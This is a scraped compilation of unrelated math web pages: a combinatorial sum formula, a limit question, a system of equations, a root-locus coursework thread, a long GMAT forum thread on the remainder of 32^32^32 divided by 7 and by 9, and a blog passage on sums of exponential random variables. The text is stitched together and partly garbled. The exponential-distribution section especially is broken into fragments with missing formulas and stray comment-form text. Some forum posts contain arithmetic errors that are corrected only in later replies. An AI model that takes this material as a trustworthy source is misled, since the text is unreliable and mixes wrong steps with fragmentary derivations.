$0$

and so the formula is $$0{n \choose 0} + 13{n \choose 1}+19{n \choose 2}+8{n \choose 3},$$ which of course agrees with Mariano's answer.

A nice explanation is math.stackexchange.com/a/18990/589 – lhf

Wolfram Alpha can also find a formula. – lhf
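Both closed forms (the Faulhaber-style cubic from the first answer and the Newton-series expression from the second) can be checked against direct summation; a quick sketch:

```python
from math import comb

def brute(N):
    return sum(4*x*x + 7*x + 2 for x in range(1, N + 1))

def faulhaber(N):
    # the closed form from the first answer; 8N^3 + 33N^2 + 37N is always
    # divisible by 6, so integer division is exact
    return (8*N**3 + 33*N**2 + 37*N) // 6

def newton(N):
    # the Newton-series form built from the first column of the difference table
    return 13*comb(N, 1) + 19*comb(N, 2) + 8*comb(N, 3)

print(all(brute(N) == faulhaber(N) == newton(N) for N in range(50)))  # True
```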
http://www.chegg.com/homework-help/questions-and-answers/use-the-laplace-transform-to-solve-the-following-initial-value-problem-use-stept-c-for-q3408050
## Use the Laplace transform to solve the following initial value problem

(If you can help me with this I can finish the rest.) Use step(t-c) for.
https://math.stackexchange.com/questions/3114042/error-while-evaluating-limit
# Error While Evaluating Limit

**Please avoid this question.**

$$\lim_{x\rightarrow 0}\frac{27^x - 9^x - 3^x + 1}{\sqrt{2} - \sqrt{1+\cos x}}$$

I tried to solve it by applying L'Hospital's rule: $$\lim_{x\rightarrow 0}\frac{27^x\ln 27- 9^x\ln 9- 3^x\ln 3 + 0}{(-1/2)/\sqrt{1+\cos x}}$$ Now simply apply the limit: $$\lim_{x\rightarrow 0}\frac{1\cdot\ln 27- 1\cdot\ln 9 - 1\cdot\ln 3}{(-1/2)/\sqrt{2}}=0$$ But the correct answer in my textbook is $$8\sqrt{2}(\ln3)^2.$$ Where am I going wrong?

Edit: I made a silly mistake while solving it.

• Rationalise the denominator, then write $1-\cos x$ as $2\sin^2(x/2)$. – maveric Feb 15 at 15:55

The derivative of $\sqrt{1+\cos x}$ is $\dfrac{-\sin x}{2\sqrt{1+\cos x}}$, not $\dfrac{-1/2}{\sqrt{1+\cos x}}$.
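A numerical sanity check (not a derivation) supports the textbook answer: evaluating the quotient at a small $x$ lands close to $8\sqrt{2}(\ln 3)^2 \approx 13.66$:

```python
import math

def f(x):
    num = 27**x - 9**x - 3**x + 1          # factors as (9**x - 1) * (3**x - 1)
    den = math.sqrt(2) - math.sqrt(1 + math.cos(x))
    return num / den

target = 8 * math.sqrt(2) * math.log(3) ** 2   # the textbook answer, about 13.66
print(abs(f(1e-4) - target) < 1e-2)            # True
```

Taking $x$ too small eventually runs into floating-point cancellation in the denominator, so $10^{-4}$ is a deliberate middle ground.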
https://www.cut-the-knot.org/m/Algebra/SystemOfEllipticEquations.shtml
# A System of Two Equations Replete with Squares

### Solution

Let, for simplicity, $a=x^2,\,b=y^2.\,$ The system can be written as $$\left\{\begin{aligned}&16a+25b=400\\&a+b=\frac{(4a+5b)^2}{400}\end{aligned}\right.$$ The second equation transforms into $400(a+b)=(4a+5b)^2.\,$ Replacing $400\,$ from the first equation gives $(16a+25b)(a+b)=(4a+5b)^2,$ i.e., $16a^2+25ab+16ab+25b^2=16a^2+40ab+25b^2,$ which simplifies to $ab=0,\,$ same as $xy=0.\,$ Note that $x,y\,$ can't vanish simultaneously. Thus, two cases: either $x=0\,$ or $y=0.\,$ The first case gives solutions $(0,\pm 4),\,$ the second $(\pm 5, 0).$

### Acknowledgment

Dan Sitaru has kindly posted the above problem of his from the Romanian Mathematical Magazine at the CutTheKnotMath facebook page, along with the above solution by Seyran Ibrahimov.
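As a sketch, the claimed solution set can be verified against both equations in exact integer arithmetic (the second equation is used in its cleared form, $400(x^2+y^2)=(4x^2+5y^2)^2$):

```python
def on_first(x, y):
    return 16 * x**2 + 25 * y**2 == 400

def on_second(x, y):
    # the second equation, cleared of the denominator 400
    return 400 * (x**2 + y**2) == (4 * x**2 + 5 * y**2) ** 2

solutions = [(0, 4), (0, -4), (5, 0), (-5, 0)]
print(all(on_first(x, y) and on_second(x, y) for x, y in solutions))  # True
```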
http://www.physicsforums.com/showthread.php?p=2219243
Coursework : Root Locus

Quote by CEL: When is $$Ke^{-\alpha t}$$ equal to 0.01K or 0.02K?

$$\frac{-\ln(0.01)}{\alpha}$$

Quote by CEL: Obtain the time response and verify how long it takes from 10% to 90% of steady state.

Quote by Altairs: I have got the steady-state value, but how do I get the time response? Laplace transform? Isn't there some shorter method? This is because I have got a zero as well in the PI controller, so the general formulae don't work. Any approximation? I don't want to go for any tedious method...

You must take the inverse transform of the response Y(s). Don't forget that the transform of the step is 1/s, so the s in the denominator cancels the s in the numerator.
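A quick numerical sketch of the quoted hint (the decay rate alpha = 2 below is an arbitrary, made-up value): the exponential $Ke^{-\alpha t}$ falls to 1% of $K$ at $t = -\ln(0.01)/\alpha = \ln(100)/\alpha$.

```python
import math

alpha = 2.0                            # decay rate; an arbitrary made-up value
t_settle = -math.log(0.01) / alpha     # time for K*exp(-alpha*t) to reach 0.01*K

# Check: the normalized response at t_settle is exactly 1% (up to roundoff).
print(abs(math.exp(-alpha * t_settle) - 0.01) < 1e-12)   # True
```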
http://gmatclub.com/forum/what-is-the-remainder-when-32-32-32-is-divided-by-100316-20.html?kudos=1
What is the remainder when 32^32^32 is divided by 7? : GMAT Problem Solving (PS) - Page 2

# What is the remainder when 32^32^32 is divided by 7?

CEO Status: Nothing comes easy: neither do I want. Joined: 12 Oct 2009 Posts: 2795 Location: Malaysia Concentration: Technology, Entrepreneurship Schools: ISB '15 (M) GMAT 1: 670 Q49 V31 GMAT 2: 710 Q50 V35

### 03 Sep 2010, 07:43

anshumishra: It's good if you know Euler's theorem. (What is used here is Fermat's little theorem, a special case of Euler's theorem.) Guys, you do not have to learn all these theorems for the GMAT; if you know them, good, but if not you can still solve this question using the basics of remainders. Do not panic. When 32^32 is divided by 6 the remainder is 4, not 2. Please check your solution.
32^32 when divided by 6 gives the same remainder as 2^32 divided by 6: 2^32 mod 6 = $$(2^{5\cdot 6})\cdot 2^2$$ mod 6 = 32^6 * 4 mod 6 = 2^6 * 4 mod 6 = 2^5 * 2^3 mod 6 = 2*2 = 4.

_________________ Fight for your dreams: For all those who fear from Verbal, let's give it a fight. Money Saved is the Money Earned. Jo Bole So Nihaal, Sat Shri Akaal.

### 03 Sep 2010, 09:19

Thanks Gurpreet, I have edited my post, where I had missed multiplying by 4 instead of 2. I have made the "4" bold. Thanks.

### 03 Sep 2010, 13:07

mainhoon wrote: How do you get 32^32 = 6x + k?

anshumishra wrote: 32^32^32 % 7 = ? I am using Euler's method; search on Wikipedia if you need the proof, else try to follow the steps. HCF(32,7) = 1, and phi(7) = 6 (the number of positive integers less than 7 and prime to 7; in fact, for any prime number "n" it is "n-1"). => 32^6 mod 7 = 1 ("mod" is the same as "%"). (To make sure you understand it, try any "n" that is not a multiple of 7: n^6 mod 7 = 1.) So we now need to express 32^32 = 6x + k, i.e. 32^32 % 6 = ? To make it easier, let's find 16^32 % 3 and multiply the remainder by 4 (since 32 and 6 have the common factor 2, and it is easier to work with a remainder modulo a prime). Apply the same approach as shown above: HCF(16,3) = 1, phi(3) = 2 => 16^2 mod 3 = 1 => 16^32 mod 3 = 1 => 32^32 mod 6 = 4*1 = 4. So 32^32 = 6y + 4. Therefore 32^32^32 mod 7 = 32^(6y+4) mod 7 = 32^4 mod 7 = (28+4)^4 mod 7 = 4^4 mod 7 = 4. (Hopefully, I didn't make any typo....
Let me know if there is any problem with understanding this.) Thanks. Posted from my mobile device.

You mean: How do you get 32^32 = 6x + k? Since 32^6 mod 7 = 1, we also have 32^(6x) mod 7 = 1; that is why I am trying to express 32^32 in the form 6x + k, so that you only have to work out 32^k mod 7. How k is calculated is shown above.

### 04 Sep 2010, 10:35

Similar question to test what you have learnt from the previous post. What is the remainder when $$32^{32^{32}}$$ is divided by 9?

A. 7
B. 4
C. 2
D. 0
E. 1

### 04 Sep 2010, 11:31

32^32^32 % 9 = ? 32^32^32 = 2^2^161. Here the remainder repeats a pattern of 6: 2, 4, 8, 7, 5, 1. So 2^2^161 % 9 = 2^5 % 9 = 5.

### 04 Sep 2010, 13:05

How did you get the step in red? Do not copy Bunuel's explanation; this time it has to be divided by 9, not 7.
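All of this modular bookkeeping can be confirmed in one line each with Python's three-argument pow, which does fast modular exponentiation even for the 161-bit exponent 32^32 (this reads the tower top-down, as 32^(32^32)):

```python
e = 32 ** 32                 # the tower's exponent: a 161-bit integer, no problem in Python
print(e % 6)                 # 4, matching "32^32 mod 6 = 4"
print(pow(32, e, 7))         # 4, so 32^(32^32) mod 7 = 4
print(pow(32, 4, 7))         # 4, consistent with 32^(6y+4) = 32^4 (mod 7)
```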
### 04 Sep 2010, 13:12

Guys, bear with me; I am posting a question I created. What is the remainder when $$11^{11^{11^{\cdots}}}$$ (the tower repeated 10 times) is divided by 4?

a. 1
b. 0
c. 3
d. 2
e. None

This is a very easy question. This concept will help in many other questions. THINK LOGICALLY AND REVISE THE BASICS OF REMAINDERS.

### 04 Sep 2010, 14:03

11^z % 4 = (12-1)^z % 4 = (-1)^z % 4 = 3 if z is odd, else 1 when z is even.

### 04 Sep 2010, 14:07

gurpreetsingh wrote: anshumishra wrote: 32^32^32 % 9 = ?
32^32^32 = 2^2^161 Here the remainder repeats the pattern of 6: 2,4,8,7,5,1 So, 2^2^161 % 9 = 2^5 % 9 = 5 How did you get the step in red? Do not copy Bunuel's explanation; this time it has to be divided by 9, not 7. Yeah, I thought to copy the partial solution of Bunuel to save some time; however, I made a mistake because of rushing through it: 32^32^32 % 9 = (27+5)^32^32 % 9 = 5^32^32 % 9 = 5^2^160 % 9 The cyclicity here is 6, so it could be solved the same way. I am not going to try it again this time. CEO Status: Nothing comes easy: neither do I want. Joined: 12 Oct 2009 Posts: 2795 Location: Malaysia Concentration: Technology, Entrepreneurship Schools: ISB '15 (M) GMAT 1: 670 Q49 V31 GMAT 2: 710 Q50 V35 Followers: 226 Kudos [?]: 1620 [0], given: 235 04 Sep 2010, 14:39 anshumishra wrote: gurpreetsingh wrote: anshumishra wrote: 32^32^32 % 9 = ? 32^32^32 = 2^2^161 Here the remainder repeats the pattern of 6: 2,4,8,7,5,1 So, 2^2^161 % 9 = 2^5 % 9 = 5 How did you get the step in red? Do not copy Bunuel's explanation; this time it has to be divided by 9, not 7. Yeah, I thought to copy the partial solution of Bunuel to save some time; however, I made a mistake because of rushing through it: 32^32^32 % 9 = (27+5)^32^32 % 9 = 5^32^32 % 9 = 5^2^160 % 9 The cyclicity here is 6, so it could be solved the same way. I am not going to try it again this time. The most important thing is to learn the concept. Intern Joined: 10 Oct 2010 Posts: 23 Location: Texas Followers: 3 Kudos [?]: 18 [0], given: 1 10 Oct 2010, 02:09 Hi, I'm new here.
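(Another aside, not part of the thread: the 11-tower question above can be sanity-checked the same way. Since 11 ≡ -1 (mod 4) and every power tower of 11s is odd, the remainder is 3 for any height of the tower; a three-storey tower is already small enough to test directly.)

```python
# 11^(11^11) mod 4, computed exactly; 11**11 is a 12-digit odd integer.
tower_remainder = pow(11, 11 ** 11, 4)
print(tower_remainder)    # -> 3
```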
First, I wanted to say thank you to everyone for all of the awesome questions and explanations throughout the forum. Second, here are my explanations for the three questions that have been posted. R{x/y} represents the remainder of x divided by y. R{(ab)/y} = R{ (R{a/y}*R{b/y}) / y} <---- I found this on one of the forum posts. Therefore, R{(a^c)/y} = R{(R{a/y}^c) / y} <---- I used a nested version of this on all three problems. Problem 1) R{32^(32^32)/7} = R{(R{(R{32/7}^32) / 7}^32) / 7} <-------- R{32/7} = 4 = R{(R{( 4 ^32) / 7}^32) / 7} <-------- R{(4^32)/7} = 2, (R cycles 4,2,1,4,2,1...) = R{( 2 ^32) / 7} <-------- R{(2^32)/7} = 4, (R cycles 2,4,1,2,4,1...) = 4 Problem 2) R{32^(32^32)/9} = R{(R{(R{32/9}^32) / 9}^32) / 9} <-------- R{32/9} = 5 = R{(R{( 5 ^32) / 9}^32) / 9} <-------- R{(5^32)/9} = 7, (R cycles 5,7,8,4,2,1,5...) = R{( 7 ^32) / 9} <-------- R{(7^32)/9} = 4, (R cycles 7,4,1,7,4,1...) = 4 Problem 3) R{11^(11^(11^(11^(11...etc))))/4} = R{(R{(R{11/4}^11) / 4}^11....etc.) / 4} <-------- R{11/4} = 3 = R{(R{( 3 ^11) / 4}^11....etc.) / 4} <-------- R{(3^11)/4} = 3, (R cycles 3,1,3,1...) = R{( 3 ^11....etc.) / 4} <-------- R{(3^11)/4} = 3, (R cycles 3,1,3,1...) = 3 Retired Moderator Status: 2000 posts! I don't know whether I should feel great or sad about it! LOL Joined: 04 Oct 2009 Posts: 1712 Location: Peru Schools: Harvard, Stanford, Wharton, MIT & HKS (Government) WE 1: Economic research WE 2: Banking WE 3: Government: Foreign Trade and SMEs Followers: 97 Kudos [?]: 914 [0], given: 109 17 Oct 2010, 15:25 Bunuel wrote: So we should find whether $$2^{161}$$ (the power of 2) is the 1st, 2nd or 3rd number in the above pattern of 3. $$2^{161}$$ is 2 in an odd power, and 2 in an odd power gives a remainder of 2 when divided by the cyclicity number 3, so it's the second number in the pattern. Which means that the remainder of $$2^{2^{161}}$$ divided by 7 would be the same as $$2^2$$ divided by 7. $$2^2$$ divided by 7 yields a remainder of 4.
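(A small helper, not from the forum, that makes the "R cycles ..." annotations above concrete; it assumes gcd(base, modulus) = 1 so the remainder sequence is purely periodic.)

```python
def remainder_cycle(base, modulus):
    """Remainders of base^1, base^2, base^3, ... until the pattern repeats.
    Assumes gcd(base, modulus) == 1, so the sequence is purely periodic."""
    cycle, r = [], 1
    while True:
        r = (r * base) % modulus
        if cycle and r == cycle[0]:
            return cycle
        cycle.append(r)

print(remainder_cycle(4, 7))   # -> [4, 2, 1]          (Problem 1)
print(remainder_cycle(5, 9))   # -> [5, 7, 8, 4, 2, 1] (Problem 2)
print(remainder_cycle(3, 4))   # -> [3, 1]             (Problem 3)

# The nested identity R{(a^c)/y} = R{(R{a/y}^c)/y} in action:
assert pow(32, 32, 7) == pow(32 % 7, 32, 7)
```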
Hi Bunuel, I don't understand the part of the explanation highlighted in red. Before that part, you analyzed $$2^{161}$$ and concluded that its remainder is 4 (the second number in the pattern). I am OK with that. However, I don't understand when you conclude that the remainder will also be 4 when you analyze $$2^{2^{161}}$$. I don't follow you. Thanks! _________________ "Life’s battle doesn’t always go to stronger or faster men; but sooner or later the man who wins is the one who thinks he can." My Integrated Reasoning Logbook / Diary: http://gmatclub.com/forum/my-ir-logbook-diary-133264.html Manager Joined: 25 Jul 2010 Posts: 175 WE 1: 4 years Software Product Development WE 2: 3 years ERP Consulting Followers: 7 Kudos [?]: 50 [0], given: 15 17 Oct 2010, 18:12 Was trying to use the remainder theorem but just gave up :D _________________ Director Joined: 23 Apr 2010 Posts: 584 Followers: 2 Kudos [?]: 78 [0], given: 7 Find the remainder when 32^32^32 is divided by 7? 28 Sep 2011, 00:47 Find the remainder when 32^32^32 is divided by 7? I know this question has been raised several times on this forum, but I can't find the post. Thanks. Intern Joined: 05 Jul 2011 Posts: 25 Followers: 0 Kudos [?]: 0 [0], given: 2 Re: Find the remainder when 32^32^32 is divided by 7? 28 Sep 2011, 21:33 Do you mean 32^{32^{32}} ? If yes, the answer is here: tough-remainder-question-100316-20.html Director Joined: 23 Apr 2010 Posts: 584 Followers: 2 Kudos [?]: 78 [0], given: 7 Re: Find the remainder when 32^32^32 is divided by 7? 29 Sep 2011, 01:14 nrgmat, thanks a lot. That's what I've been looking for. Manager Joined: 18 Jun 2010 Posts: 148 Followers: 0 Kudos [?]: 34 [0], given: 2 19 Oct 2011, 20:35 Bunuel wrote: gurpreetsingh wrote: What is the remainder when $$32^{32^{32}}$$ is divided by 7? A. 5 B. 4 C. 2 D. 0 E.
1 I will post the Answer and the explanation after some replies. If we use the above approach, I'd work with a prime as the base. $$32^{{32}^{32}}=(28+4)^{{32}^{32}}$$ now if we expand this, all terms but the last one will have 28 as a multiple and thus will be divisible by 7. The last term will be $$4^{{32}^{32}}=4^{{(2^5)}^{32}}=4^{2^{160}}=2^{2^{161}}$$. So we should find the remainder when $$2^{2^{161}}$$ is divided by 7. 2^1 divided by 7 yields remainder of 2; 2^2 divided by 7 yields remainder of 4; 2^3 divided by 7 yields remainder of 1; 2^4 divided by 7 yields remainder of 2; 2^5 divided by 7 yields remainder of 4; 2^6 divided by 7 yields remainder of 1; ... The remainder repeats the pattern of 3: 2-4-1. So we should find whether $$2^{161}$$ (the power of 2) is the 1st, 2nd or 3rd number in the above pattern of 3. $$2^{161}$$ is 2 in an odd power, and 2 in an odd power gives a remainder of 2 when divided by the cyclicity number 3, so it's the second number in the pattern. Which means that the remainder of $$2^{2^{161}}$$ divided by 7 would be the same as $$2^2$$ divided by 7. $$2^2$$ divided by 7 yields remainder of 4. Similar problem: remainder-99724.html?hilit=expand%20this,%20all%20terms#p768816 Hope it's clear. A new concept learnt. Thanks Intern Joined: 01 Oct 2011 Posts: 24 GMAT 1: 730 Q49 V41 WE: Information Technology (Computer Software) Followers: 1 Kudos [?]: 15 [0], given: 21 19 Oct 2011, 22:25 trueblue wrote: gurpreetsingh wrote: What is the remainder when $$32^{32^{32}}$$ is divided by 7? A. 5 B. 4 C. 2 D. 0 E. 1 I will post the Answer and the explanation after some replies. Intuitively, I did it like this. 32^32^32 = (28+4)^32^32 As 28 is divisible by 7, we don't need to worry about that part. Hence for the purpose of the remainder, our equation boils down to 4^32^32 The cyclicity of 4 is 3 when divided by 7, hence we need to think about the value of 32^32 and what remainder it leaves when divided by 3. Considering 32^32, it can be broken into (30+2)^32.
Again, 30^32 is divisible by 3, hence we need to focus on 2^32. 2^32 can be written as (2^2)^16 = (3+1)^16. As all the terms containing 3 are divisible by 3, we will be left with 1^16. Thus 1 would be the remainder when 32^32 is divided by 3. This implies that 4 will be the remainder when divided by 7. Do let me know if I am wrong in my thinking. Thanks. Very good explanation... thanks _________________ - Success is not final, failure is not fatal: it is the courage to continue that counts http://gmatclub.com/forum/finally-gmat-is-over-730-49q-41v-130632.html Manager Joined: 07 Dec 2011 Posts: 174 Location: India Followers: 1 Kudos [?]: 41 [0], given: 24 23 Mar 2012, 04:35 Find the cycle of remainders, which is 2,4,1. The total power of 2 is 5 x 32^32; divide that by 3 and get a remainder of 2, so the second value in the cycle, i.e. 4, is the answer. B. Intern Joined: 12 Mar 2012 Posts: 16 Followers: 0 Kudos [?]: 7 [0], given: 19 Re: What is the remainder when 32^32^32 is divided by 7? 19 Apr 2012, 09:51 gurpreetsingh wrote: What is the remainder when $$32^{32^{32}}$$ is divided by 7? A. 5 B. 4 C. 2 D. 0 E. 1 Check the solution here: tough-remainder-question-100316.html#p774893 Guys, found one more method to solve the problem: 32^32^32 = (28+4)^32^32. 28^32^32 is divisible by seven, and we are only concerned about 4^32^32 = 4^2^160 = 2^2^161. Now 2^161 = (2^10)^16 x 2^1 = 1024^16 x 2. The last digit of 1024^16 will be the last digit of 4^16, i.e. 6. The last digit of 1024^16 x 2 => 6 x 2 = 12 => 2. Thus the equation boils down to 2^2 = 4 divided by 7; the remainder will be 4, the answer.
https://www.theuprightgroup.com/nenx88o3/aacdaa-sum-of-exponential-distribution
# sum of exponential distribution

Desperately searching for a cure. The law of is given by: Proof. I concluded this proof last night. I know that they will then not be completely independent anymore. The answer is a sum of independent exponentially distributed random variables, which is an Erlang (n, λ) distribution. Let be independent random variables with an exponential distribution with pairwise distinct parameters , respectively. PROPOSITION 3 (m = 2). Our problem is: what is the expression of the distribution of the random variable ? Let’s define the random variables and . Therefore, the scale parameter is λ = 1/μ = 1/5 = 0.20. Now, calculate the probability function at different values of x to derive the distribution curve. In fact, the process can be extended to the case of a sum of a finite number n of random variables of distribution Exp(λ), and we can observe that the pdf of the sum, Z_n, is given by the Erlang (n, λ) density, i.e. f_{Z_n}(z) = λ^n z^{n-1} e^{-λz} / (n-1)!. The generalized exponential distribution, or the exponentiated exponential distribution, is defined as a particular case of the Gompertz-Verhulst distribution function (1), when ρ = 1. Sum of Exponential Random Variables has Gamma Distribution - Induction Proof - YouTube. Correction: at the induction step "f_{gamma_n}(t-s)" should equal "f_{X_n}(t-s)", i.e. For x = 0. So, we have: PROPOSITION 5 (m = 4). This has been the quality of my life for most of the last two decades. But this is the integral calculated in Prop. I faced the problem for m = 2, 3, 4. So we have: The sum within brackets can be written as follows: So far, we have found the following relationship: In order for the thesis to be true, we just need to prove that.
The law of is given by: Proof. In order to carry out our final demonstration, we need to prove a property that is linked to the matrix named after Vandermonde, that the reader who has followed me till this point will likely remember from his studies of linear algebra. Then, the sum is a Gamma random variable with parameters and . For those who might be wondering how the exponential distribution of a random variable with a parameter looks like, I remind that it is given by: The negative exponential distribution is the probability distribution that describes the time between events in a Poisson process, i.e. So we have: For the four integrals we can easily calculate what follows: Adding these four integrals together we obtain: We are now quite confident in saying that the expression of for the generic value of m is given by: for y > 0, while being zero otherwise. I can now come back to my awkward studies, which span from statistics to computational immunology, from analysis of genetic data to mathematical modelling of bacterial growth.
3(x) is the distribution function of the random variable Z = X + Y. When I use . Let’s derive the PDF of Exponential from scratch! It is easy to see that the convolution operation is commutative, and it is straightforward to show that it is also associative. a process in which events occur continuously and independently at a constant average rate, and X_i and n = independent variables. The law of is given by: Proof. Consider I want x random numbers that sum up to one and that distribution is exponential. Exponential Random Variable Sum. As the name suggests, the basic exponential-logarithmic distribution arises from the exponential distribution and the logarithmic distribution via a certain type of randomization. PROPOSITION 7. We just have to substitute in Prop. The determinant of the Vandermonde matrix is given by: PROPOSITION 6 (lemma). 1. Let be independent exponential random variables with distinct parameters , respectively. Define. A typical application of exponential distributions is to model waiting times or lifetimes. The two random variables and (with n The Erlang distribution is a special case of the Gamma distribution.
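(A simulation sketch, not part of the original post; the parameter values are arbitrary. The sum of n i.i.d. Exp(λ) draws should behave like an Erlang(n, λ), i.e. a Gamma with integer shape, with mean n/λ and variance n/λ².)

```python
import random

random.seed(0)  # fixed seed so the check is reproducible

n, lam, trials = 4, 2.0, 200_000
totals = [sum(random.expovariate(lam) for _ in range(n)) for _ in range(trials)]

mean = sum(totals) / trials
var = sum((t - mean) ** 2 for t in totals) / trials
print(mean)  # should be close to n/lam    = 2.0
print(var)   # should be close to n/lam**2 = 1.0
```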
Tags: Sum of independent exponential random variables, Myalgic Encephalomyelitis/Chronic Fatigue Syndrome, Postural orthostatic tachycardia syndrome (POTS), Sum of independent exponential random variables with the same parameter – paolo maccallini. Other examples include the length, in minutes, of long distance business telephone calls, and the amount of time, in months, a car battery lasts. The definition of exponential distribution is the probability distribution of the time *between* the events in a Poisson process. The geometric distribution is a discrete analog of the exponential distribution and is the only discrete distribution with a constant hazard function. The Gamma random variable of the exponential distribution with rate parameter λ can be expressed as: $Z=\sum_{i=1}^{n}X_{i}$ Here, Z = gamma random variable. Suppose that $$\bs T = (T_1, T_2, \ldots)$$ is a sequence of independent random variables, each with the standard exponential distribution. Then $$W = \min(W_1, \ldots, W_n)$$ is the winning time of the race, and $$W$$ has an Exponential distribution with rate parameter equal to the sum of the individual contestant rate parameters.
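(Again a sketch with made-up rates, not from the post: the winning time of the "race", the minimum of independent exponentials, is itself exponential with rate equal to the sum of the individual rates, so its mean is 1 over that sum.)

```python
import random

random.seed(1)

rates, trials = [1.0, 2.0, 3.0], 200_000
wins = [min(random.expovariate(r) for r in rates) for _ in range(trials)]

mean_win = sum(wins) / trials
print(mean_win)  # should be close to 1 / (1 + 2 + 3) = 1/6
```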
Exponential Distribution "Memoryless" Property. However, we have P(X > t) = 1 - F(t; λ) = e^{-λt}. Therefore, we have P(X > t) = P(X > t + t_0 | X > t_0) for any positive t and t_0, where the second equality used independence, and the next one used that S, being the sum of n independent exponential random variables with rate λ, has a gamma distribution with parameters n, λ. The half life of a radioactive isotope is defined as the time by which half of the atoms of the isotope will have decayed. identically distributed exponential random variables with mean 1/λ. 2 – that and are independent. These two random variables are independent (Prop. That is, the half life is the median of the exponential … In words, the distribution of additional lifetime is exactly the same as the original distribution of lifetime, so … Memorylessness Property of Exponential Distribution. PROPOSITION 1. The distribution of the sum of independent random variables is the convolution of their distributions. Searching for a common denominator allows us to rewrite the sum above as follows: References.
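(The memoryless identity P(X > t_0 + t | X > t_0) = P(X > t) can be checked directly from the survival function alone; the numbers below are arbitrary.)

```python
import math

def survival(x, lam):
    """P(X > x) for X ~ Exp(lam)."""
    return math.exp(-lam * x)

lam, t, t0 = 0.5, 3.0, 2.0
conditional = survival(t0 + t, lam) / survival(t0, lam)
print(math.isclose(conditional, survival(t, lam)))  # -> True
```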
1. The distribution of is given by: where f_X is the distribution of the random vector []. This lecture discusses how to derive the distribution of the sum of two independent random variables. We explain first how to derive the distribution function of the sum and then how to derive its probability mass function (if the summands are discrete) or its probability density function (if the summands are continuous). Let be independent random variables. 2. Read about it, together with further references, in “Notes on the sum and maximum of independent exponentially distributed random variables with different scale parameters” by Markus Bibinger. 1 – we have: Now, is the thesis for m-1 while is the exponential distribution with parameter . 12, and the proof is concluded ♦ A numerical application. (15.7) The above example describes the process of computing the pdf of a sum of continuous random variables. Our first question was: Why is λ * e^(−λt) the PDF of the time until the next event occurs? But we aim at a rigorous proof of this expression. joint conditional pdf of given sum of exponential distribution. by Marco Taboga, PhD.
Below, suppose random variable X is exponentially distributed with rate parameter λ, and $${\displaystyle x_{1},\dotsc ,x_{n}}$$ are n independent samples from X, with sample mean $${\displaystyle {\bar {x}}}$$. endobj Suppose that $$\bs T = (T_1, T_2, \ldots)$$ is a sequence of independent random variables, each with the standard exponential distribution. Then, when I was quite sure of the expression of the general formula of (the distribution of Y) I made my attempt to prove it inductively. That is, if , then, (8) (2) The rth moment of Z can be expressed as; (9) Cumulant generating function By definition, the cumulant generating function for a random variable Z is obtained from, By expansion using Maclaurin series, (10) PROPOSITION 2. 1 – we can write: The reader has likely already realized that we have the expressions of and , thanks to Prop. the mean of the distribution) X is a non-negative continuous random variable with the cdf ... X is the sum of n independent random variables with the distribution Exp(λ) joint conditional pdf of given sum of exponential distribution. Our first question was: Why is λ * e^(−λt) the PDF of the time until the next event occurs? x<-c(10,100,1000) a<-rexp(x[3],rate=1) a<-a/sum(a) This will change the distribution, right? But we aim at a rigorous proof of this expression. In the following lines, we calculate the determinant of the matrix below, with respect to the second line. Modifica ), Stai commentando usando il tuo account Facebook. S n = Xn i=1 T i. • Distribution of S n: f Sn (t) = λe −λt (λt) n−1 (n−1)!, gamma distribution with parameters n and λ. This study considers the nature of order statistics. This is only a poor thing but since it is not present in my books of statistics, I have decided to write it down in my blog, for those who might be interested. Considera una donazione per sostenere questo blog. A paper on this same topic has been written by Markus Bibinger and it is available here. 
• Define S n as the waiting time for the nth event, i.e., the arrival time of the nth event. Student’s t-distributions are normal distribution with a fatter tail, although is approaches normal distribution as the parameter increases. Generalized Pareto Distribution — The generalized Pareto distribution is a three-parameter continuous distribution that has parameters k (shape), σ (scale), and θ … Let be independent random variables. Then, some days ago, the miracle happened again and I found myself thinking about a theorem I was working on in July. The exponential distribution is often used to model lifetimes of objects like radioactive atoms that undergo exponential decay. So I could do nothing but hanging in there, waiting for a miracle, passing from one medication to the other, well aware that this state could have lasted for years, with no reasonable hope of receiving help from anyone. 2) so – according to Prop. Suppose , , ..., are mutually independent random variables having exponential distribution with parameter . where f_X is the distribution of the random vector [].. endobj We obtain: PROPOSITION 4 (m = 3). The discrete random variable $$I$$ is the label of which contestant is the winner. Hot Network Questions What is the mechanism that triggers a stock price change? The exponential distribution is often concerned with the amount of time until some specific event occurs. An interesting property of the exponential distribution is that it can be viewed as a continuous analogue of the geometric distribution. 2 0 obj ) distribution and, thanks to Prop inserisci i tuoi dati sum of exponential distribution sotto o clicca su un'icona effettuare! Function can be a non-integer discrete random variable with parameters and this is the probability function at different of. Specific event occurs a way so that the thesis is true for m = 2, 3,.. Which is an interesting, and key, relationship between the Poisson and exponential distribution is the exponential and! 
Now, calculate the probability distribution that describes the process of computing the pdf of a isotope! ( n, Î » = 1 / μ = 1 / =...: where f_X is the sum of exponential distributions is to model waiting times or lifetimes in events! With n < m ) are independent happened again and i found myself about. Been written by Markus Bibinger and it is available here, the distribution... Probability distribution in probability theory and statistics, the amount of time until some specific event occurs: probability that... Erlang and Gamma is that in a Gamma distribution, n can be a.. A process in which events occur continuously and independently at a constant average rate.. joint conditional of! S consider the two random variables with distinct parameters, respectively and it is available here:,. Time of the random variable \ ( I\ ) is the exponential distribution ( a.k.a ). With pairwise distinct parameters, respectively reliability engineering atoms of the random vector [ ] a tail. Variables is the distribution of the Gamma distribution parameter, Î » ) distribution often used to waiting... Account Twitter we obtain: PROPOSITION 5 ( m = 3 ) where f_X is sum of exponential distribution... Topic has been written by Markus Bibinger and it is available here Gamma. ) = n/Î » tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso: Stai commentando il. See that the thesis for m-1 while is the exponential distribution is associative! Poisson process, i.e have decayed earthquake occurs has an exponential distribution is associative... Two- There is an interesting, and the proof is concluded ♦ a numerical application the sum is a There! A radioactive isotope is defined as the parameter increases my life for most of the below. Of is given by: PROPOSITION 4 ( m = 3 ) But this is the integral in... A very useful component in reliability engineering beginning now ) until an earthquake occurs has an exponential distribution is probability. 
In probability theory and statistics, the exponential distribution is the probability distribution of the time between events in a Poisson process, that is, a process in which events occur continuously and independently at a constant average rate. It is memoryless, and it is commonly used to model waiting times or lifetimes, for example the decay of radioactive atoms: the half-life of a radioactive isotope is the time by which half of the atoms will have decayed. For instance, if the mean waiting time is 5, the rate parameter is λ = 1/5 = 0.20 and the density is f(x) = 0.20 e^(−0.20x).

